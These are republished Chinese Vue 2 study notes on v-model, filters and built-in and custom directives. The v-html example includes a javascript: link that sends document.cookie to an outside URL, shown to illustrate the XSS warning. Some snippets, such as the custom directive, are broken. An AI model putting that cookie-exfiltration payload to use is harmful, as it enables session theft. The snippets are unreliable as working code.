vue part4

收集表单数据

v-model

label直接包住input不用关联也可以获取焦点

<!DOCTYPE html>
<html lang="en"><head><meta charset="UTF-8"><title>收集表单数据</title><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/vue/dist/vue.js"></script>
</head><body><div id="root"><form @submit.prevent="submitForm"></form>账号: <input type="text" v-model.trim="account"><br><br><!-- trim在公司中非常常用,简化string -->密码:<input type="password" v-model="password"><br><br>性别:男<input type="radio" name="sex" value="male" v-model="sex">女<input type="radio" name="sex" value="female" v-model="sex"><!-- v-model只能value值导致男女无法 --><br><br>爱好:篮球<input type="checkbox" v-model="hobby" value="篮球">足球<input type="checkbox" v-model="hobby" value="足球"><!-- 不用value就会返回1或0 -->乒乓球<input type="checkbox" v-model="hobby" value="乒乓球"><!-- habby的初始值会影响返回值--><!-- CheckBox要分情况,1)如果是数组收集各项的value;2)非数组收集的是true-value和false-value的值,默认选中为true,不选为false  --><br><br>所属校区:<select v-model=" city"><option value="">请选择校区</option><option value="beijing">北京校区</option><option value="shanghai">上海校区</option><option value="guangzhou">深圳校区</option><option value="wuhan">武汉校区</option></select><br><br>其他信息:<textarea v-model.lazy="other"></textarea><br><br><!-- lazy 修饰符可以防止频繁更新,延迟更新,减少不必要的渲染 --><input type="checkbox" v-model="agree">阅读并接受<a href="#">《用户协议》</a><button>提交</button></form><!-- 事实上会跳转的原因是 button 的 type 没有指定,默认是 submit 类型,又在 form 里,才导致了页面跳转,把 button 的 type 设为 button 也可以处理这个问题 --><!-- 可以把按钮的type参数改掉,因为不写的话默认type是submit,就会触发默认的提交事件 --></div>
</body>
<script type="text/javascript">Vue.config.productionTip = false;//阻止 vue 在启动时生成生产提示new Vue({el: '#root',data: {//userInfo: {account: '',password: '',sex: '',hobby: [],city: 'beijing',other: '',agree: false,//}    如果加了userInfo,那就要用userInfo.account,userInfo.password等等等等//按住 Alt 不放,鼠标去选},methods: {demo() {console.log(this._data)console.log(JSON.stringify(this._data))/* 都可以获取到数据,vue版和明文版*/}},})</script></html>

收集表单数据:
若:<input type="text"/>,则v-model收集的是value值,用户输入的就是value值。
若:<input type="radio"/>,则v-model收集的是value值,且要给标签配置value值。
若:<input type="checkbox"/>
1.没有配置input的value属性,那么收集的就是checked(勾选 or 未勾选,是布尔值)
2.配置input的value属性:
(1)v-model的初始值是非数组,那么收集的就是checked(勾选or 未勾选,是布尔值)
(2)v-model的初始值是数组,那么收集的的就是value组成的数组
备注:v-model的三个修饰符:
lazy:失去焦点再收集数据
number:输入字符串转为有效的数字
trim:输入首尾空格过滤

过滤器

moment.js库,很好,就是有点大,轻量级的dayjs.js

<!DOCTYPE html>
<html lang="en"><head><meta charset="UTF-8"><title>时间戳</title><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/vue/dist/vue.js"></script><script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/dayjs/1.10.4/dayjs.min.js"></script>
</head><body><div id="root"><h2>显示格式化的时间戳</h2><!-- 计算属性实现 --><h3>现在是{{ fmtTime }}</h3><!-- method实现 --><h3>现在是{{ getFmtTime() }}</h3><!-- 过滤器实现 --><h3>现在是{{ time | timeFormater}}</h3><!-- 函数的返回值要加(),返回函数体不加() --><!-- 过滤器实现 --><h3>现在是{{ time | timeFormater('YYYY年MM月DD日')}}</h3><!-- 函数的返回值要加(),返回函数体不加() --><h3>现在是{{ time | timeFormater('YYYY年MM月DD日') | mySlice }}</h3></div>
</body>
<script type="text/javascript">Vue.config.productionTip = false;//阻止 vue 在启动时生成生产提示new Vue({el: '#root',data: {time: 1921561277603},computed: {fmtTime() {return dayjs(this.time).format('YYYY年MM月DD日 HH:mm:ss')}},methods: {getFmtTime(time) {return dayjs(time).format('YYYY年MM月DD日 HH:mm:ss')}},//下面的是局部过滤器filters: {//过滤器可以对前面你写的数据进行按照某种形式加工处理//从 Vue 3.0 开始,过滤器已移除,且不再支持。timeFormater(value, str = 'YYYY年MM月DD日 HH:mm:ss') {return dayjs(value).format(str)},mySlice(value)//层层过滤,{return value.slice(0, 5)}}})</script></html>

不想写全局的

过滤器:
定义:对要显示的数据进行特定格式化后再显示(适用于一些简单逻辑的处理)。语法:
1.注册过滤器: Vue. filter(name, callback)或 new Vue{ filters:{}}
2.使用过滤器:{xxx“过滤器名}或v—bind:属性=”xxx“过滤器名”备注:
1.过滤器也可以接收额外参数、多个过滤器也可以串联2.并没有改变原本的数据,是产生新的对应的数据

指令

v-text指令

<!DOCTYPE html>
<html lang="en"><head><meta charset="UTF-8"><title>时间戳</title><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/vue/dist/vue.js"></script><script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/dayjs/1.10.4/dayjs.min.js"></script>
</head><body><div id="root"><div>你好,{{name}}</div><div v-text="name">hello</div></div>
</body>
<script type="text/javascript">Vue.config.productionTip = false;//阻止 vue 在启动时生成生产提示new Vue({el: '#root',data: {name: '尚硅谷',str: '<h3>尚硅谷</h3>'},})</script></html>

v-text指令:
1.作用:向其所在的节点中渲染文本内容。
2.与插值语法的区别:v—text会替换掉节点中的内容,{{xx}则不会。

v-html

cookie editor

这个插件可以批量下载cookies

cookies可以选择httponly,只能用http协议读取,

<!DOCTYPE html>
<html lang="en"><head><meta charset="UTF-8"><title>时间戳</title><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/vue/dist/vue.js"></script><script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/dayjs/1.10.4/dayjs.min.js"></script>
</head><body><div id="root"><div>你好,{{name}}</div><div v-text="name">hello</div></div>
</body>
<script type="text/javascript">Vue.config.productionTip = false;//阻止 vue 在启动时生成生产提示new Vue({el: '#root',data: {name: '尚硅谷',str1: '<h3>你好阿</h3>',str2: '<a href=javascript:location.href="https://www.baidu.com?"+document.cookie>想要的支援</a>'},})</script></html>

v-html指令:
1.作用:向指定节点中渲染包含html结构的内容。
2.与插值语法的区别:
(1),v—html会替换掉节点中所有的内容,{{xx}则不会。
(2).v-html可以识别html结构。
3.严重注意:v—html有安全性问题!!!!
(1),在网站上动态渲染任意HTML是非常危险的,容易导致XSS攻击。
(2),一定要在可信的内容上使用v—html,永不要用在用户提交的内容上!

v-cloak

在f12的网络里面,有一个调网速

 

<!DOCTYPE html>
<html lang="en"><head><meta charset="UTF-8"><title>时间戳</title><!-- <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/vue/dist/vue.js"></script> --><script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/dayjs/1.10.4/dayjs.min.js"></script><style>[v-cloak] {display: none;}</style>
</head><body><!-- v-cloak指令:1.本质是一个特殊属性,vue实例创建完毕接管容器后,会移除该指令,从而显示容器内容。2.使用css配合v-cloak指令,可以实现页面加载时,隐藏容器内容,解决{{xxx}}的问题--><div id="root"><h2 v-cloak>{{name}}</h2></div><script type="text/javascript" src="https//cdn.jsdelivr.net/npm/vue/dist/5s/vue.js"></script>
</body>
<script type="text/javascript">Vue.config.productionTip = false;//阻止 vue 在启动时生成生产提示new Vue({el: '#root',data: {name: '尚硅谷',},})</script></html>

v-once

v-once指令:
1.v—once所在节点在初次动态渲染后,就视为静态内容了。
2.以后数据的改变不会引起v—once所在结构的更新,可以用于优化性能。

v-pre

自定义指令

定义v-fbind指令,和v-bind相似,可以让他绑定的input元素默认获取焦点

autofocus自动获得焦点

046_尚硅谷Vue技术_自定义指令_对象式_哔哩哔哩_bilibili讲的很好

<!DOCTYPE html>
<html lang="en"><head><meta charset="UTF-8"><title>时间戳</title><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/vue/dist/vue.js"></script><script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/dayjs/1.10.4/dayjs.min.js"></script></head><body><div id="root"><h2>{{name}}</h2><h2>当前的n值是:< span-text="n"></span><h2>放大10倍后的n值是:<span v-big="n"></span></h2><button @click="n++">点我n+1</button><hr /><input type="text" v-fbind: value="n"></div>
</body>
<script type="text/javascript">Vue.config.productionTip = false;//阻止 vue 在启动时生成生产提示new Vue({el: '#root',data: {name: '尚硅谷',},directives: {//big函数何时会被调用?1.指令与元素成功绑定时(一上来)。2.指令所在的模板被重新解析时。// big(element, binding) {// console.log('big')//     element.innerText = binding.value * 10// },fbind: {bind() {// console.log('fbind')element.value = binding.value},// 指令所在元素被插入页面时,inserted() {//console.log('inserted')element.focus()},update() {//console.log('update')element.value = binding.value},}}})</script></html>

总结

这里有个好理解的方式,就是我们操作了dom,其实只有window下才能操作dom

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/409759.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Java数据结构篇

Map体系 1.HashMap 哈希冲突&#xff1a;开放定址法、再哈希法、链地址法插入元素先检查是否到达阈值&#xff0c;是则先数组扩容&#xff0c;然后再插入链表&#xff0c;链表长度超过8则转红黑树1.7之前由于扩容导致的头插法尾插法混合导致指针错误&#xff0c;出现死循环问…

编程示例:汉字生成盲文的翻译器

1 翻译器的意义 我国有视障人士2000多万人&#xff0c;需要把大量的文章与书籍转换成盲文书。 2 翻译器的开发原理 根据汉语与盲文符号的对照表&#xff0c;以此为基础&#xff0c;进行汉字与盲文之间的转换。 如下的两个图片是汉语与盲文符号的对照表。 3 翻译器的开发示例…

BMP位图原理深度解析及编程实现RGB565图片格式转换

1、前言 在Windows的画图软件中可以看到&#xff0c;常见的BMP有如下图所示的几种&#xff1a;单色位图、16色位图、256色位图和24位位图&#xff0c;其颜色深度分别为1、4、8、24。 在一些单片机设备中的LCD显示屏幕中&#xff0c;仅仅支持RGB565这一类的16位颜色深度图像&…

[windows][软件]Windows平台MongoDB的安装

1.下载软件 上mongoDB官网&#xff0c;网址&#xff1a;Download MongoDB Community Server | MongoDB&#xff0c; 下载对应的版本软件 2.安装 下载安装包如图&#xff1a; 双击安装&#xff1a; 默认&#xff0c;点击next 默认,点击next 默认点Complete&#xff0c;完整安…

混杂设备驱动、Linux内核中的中断、火焰传感器驱动、呼吸传感器驱动、等待队列

混杂设备驱动 混杂设备也叫杂项设备&#xff0c;是对普通的字符设备(struct cdev)的一种封装。misc 设备会自动创建cdev&#xff0c;不需要像我 们以前那样手动创建&#xff0c;因此采用misc 设备驱动可以简化字符设备驱动的编写。具有以下特点&#xff1a; 1) 主设备号为10&…

DVWA靶场通关(CSRF)

CSRF 是跨站请求伪造&#xff0c;是指利用受害者尚未失效的身份认证信息&#xff08;cookie、会话等&#xff09;&#xff0c;诱骗其点击恶意链接或者访问包含攻击代码的页面&#xff0c;在受害人不知情的情况下以受害者的身份向&#xff08;身份认证信息所对应的&#xff09;服…

WRF-LES与PALM微尺度气象大涡模拟

针对微尺度气象的复杂性&#xff0c;大涡模拟&#xff08;LES&#xff09;提供了一种无可比拟的解决方案。微尺度气象学涉及对小范围内的大气过程进行精确模拟&#xff0c;这些过程往往与天气模式、地形影响和人为因素如城市布局紧密相关。在这种规模上&#xff0c;传统的气象模…

生信学院|09月06日《在线产品交流工具》

课程主题&#xff1a;在线产品交流工具 课程时间&#xff1a;2024年09月06日 14:00-14:30 主讲人&#xff1a;曾裕章 生信科技 售后服务工程师 3DEXPERIENCE云平台基于云平台的交流工具XPR功能讲解Q&A 安装腾讯会议客户端或APP报名哦~~~ 或者点击链接报名&#xff1a;…

C语言进阶(一)数据在内存中的存储

整数在内存中的存储 整数的2进制表示方法有三种&#xff0c;即原码、反码和补码 有符号的整数&#xff0c;三种表示方法均有符号位和数值位两部分 符号位用0表示“正”&#xff0c;用1表示“负”&#xff0c;最高位被当做符号位&#xff0c;剩余的都是数值位 正整数的原、反…

构建buildroot根文件系统

目录 1.确定gcc工具版本2.下载Buildroot源码并编译2.1 下载Buildroot源码2.2 配置Buildroot2.2.1 配置 Target options2.2.2 配置交叉编译工具链2.2.3 配置 System configuration2.2.4 配置 Filesystem images2.2.5 禁止编译 Linux 内核和 uboot2.2.6 编译Buildroot源码2.2.7 查…

【多线程】深入剖析线程安全问题

&#x1f490;个人主页&#xff1a;初晴~ &#x1f4da;相关专栏&#xff1a;多线程 / javaEE初阶 前言 线程安全问题是在多线程学习中一个十分重要的话题。多个线程并发执行就容易产生许多冲突与问题&#xff0c;如何协调好每个线程的执行&#xff0c;让多线程编程“多而不乱…

【Node】【3】回调函数

nodejs 是一个基于事件驱动和非阻塞异步的JavaScript运行时环境。 Node.js 采用单线程模型&#xff0c; 单线程意味着 Node.js 在任何给定时刻只能执行一段代码&#xff0c;但通过异步执行回调函数&#xff0c;可以在等待 I/O 操作完成的同时继续执行其他代码&#xff0c;从而…

每日一练-threejs实现三维动态热力图

前言&#xff1a;学习自用Three.js搞个炫酷热力山丘图&#xff0c;作者讲解的十分详细&#xff0c;在这里不再过多赘述&#xff0c;直接上代码&#xff01; <template><div class"map" ref"map"></div> </template><script set…

XTuner微调个人小助手认知 #书生浦语大模型实战营#

1.任务&#xff1a; 本次的任务是使用 XTuner 微调 InternLM2-Chat-1.8B 实现自己的小助手认知&#xff0c;从而让模型能够个性化的回复&#xff0c;让模型知道他是我们的小助手&#xff0c;在实战营帮我们完成XTuner微调个人小助手认知的任务。并截图打卡。 任务打卡&#x…

书生.浦江大模型实战训练营——(十一)LMDeploy 量化部署进阶实践

最近在学习书生.浦江大模型实战训练营&#xff0c;所有课程都免费&#xff0c;以关卡的形式学习&#xff0c;也比较有意思&#xff0c;提供免费的算力实战&#xff0c;真的很不错&#xff08;无广&#xff09;&#xff01;欢迎大家一起学习&#xff0c;打开LLM探索大门&#xf…

复杂的编辑表格

需求描述 表格可以整体编辑&#xff1b;也可以单行弹框编辑&#xff1b;且整体编辑的时候&#xff0c;依然可以单行编辑 编辑只能给某一列&#xff08;这里是参数运行值&#xff09;修改&#xff0c;且根据数据内容的参数范围来判断展示不同的形式&#xff1a;input/数字输入/单…

计算机网络——TCP协议与UDP协议详解(下)

一、TCP协议 1.1 TCP协议的报文 TCP全称为 "传输控制协议(Transmission Control Protocol")。人如其名&#xff0c;要对数据的传输进行一个详细的控制。我们先看其报文格式&#xff0c;如下图&#xff1a; TCP报文由以下几个字段组成&#xff1a; 源端口号和目标端口…

MySQL索引详解:原理、数据结构与分析和优化

在数据库管理系统中&#xff0c;索引是提高查询性能、优化数据存储结构的重要工具。MySQL作为广泛使用的开源关系型数据库管理系统&#xff0c;其索引机制对于提升数据库操作效率具有至关重要的作用。本文将围绕“MySQL索引详解&#xff1a;原理、数据结构与分析和优化”这一主…

CRUD的最佳实践,联动前后端,包含微信小程序,API,HTML等(二)

CRUD老生常谈&#xff0c;但是我搜索了一圈&#xff0c;发觉几乎是着重在后端&#xff0c;也就是API部分&#xff01; 无外乎2个思路 1.归总的接口&#xff0c;比如一个接口&#xff0c;实现不同表的CRUD 2.基于各自的表&#xff0c;使用代码生成器实现CRUD 个人来说是推荐2&am…

Harmony鸿蒙应用开发:解决Web组件加载本地资源跨域

鸿蒙开发文档中有一节 加载本地页面 提到了可以通过 $rawfile 方法加载本地 HTML 网页&#xff1a; Index.ets 1Web({ src: $rawfile("local.html"), controller: this.webviewController })但是如果在 local.html 中需要引用一些静态资源&#xff0c;例如图片、JS、…